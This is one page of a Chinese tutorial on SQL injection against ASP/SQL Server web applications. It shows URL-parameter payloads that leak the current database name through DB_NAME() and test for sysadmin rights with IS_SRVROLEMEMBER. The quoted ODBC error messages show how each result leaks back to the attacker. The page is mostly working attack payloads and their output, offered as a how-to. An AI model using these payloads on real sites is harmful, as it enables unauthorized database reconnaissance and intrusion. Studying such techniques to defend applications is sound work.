打印本文 打印本文 关闭窗口 关闭窗口
基于SQL Server的WEB应用程序注入攻击详细介绍
作者:武汉SEO闵涛  文章来源:敏韬网  点击数11367  更新时间:2007/11/14 11:56:57  文章录入:mintao  责任编辑:mintao
SQL Server当前使用的数据库名称:

article_show.asp?ID=(DB_NAME())

Microsoft OLE DB Provider for ODBC Drivers 错误 ''''80040e07''''

[Microsoft][ODBC SQL Server Driver][SQL Server] nvarchar ''''sitelog'''' 转换为数据类型为 int 的列时发生语法错误。

 

测试当前用户是否为“sysadmin”组成员

SELECT IS_SRVROLEMEMBER(''''sysadmin'''')这句SQL语句可用来测试当前登录的用户是否为sysadmin的服务器角色,如果是将返回值1,不是的话返回值0。这里要将其转变为字符型数据才能看到具体数值。因此写下面的URL:(其中char(115)为字符’s’%2B为加号(+)UTF-8编码。)

article_show.asp?ID=(SELECT CHAR(115) %2B CAST(IS_SRVROLEMEMBER(''''sysadmin'''') AS VARCHAR(2)))

Microsoft OLE DB Provider for ODBC Drivers 错误 ''''80040e07''''

[Microsoft][ODBC SQL Server Driver][SQL Server] varchar ''''s0'''' 转换为数据类型为 int 的列时发生语法错误。

如果显示s0则不是’sysadmin’组成员,如果是1’’sysadmin’

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ...  下一页 >> 

打印本文 打印本文 关闭窗口 关闭窗口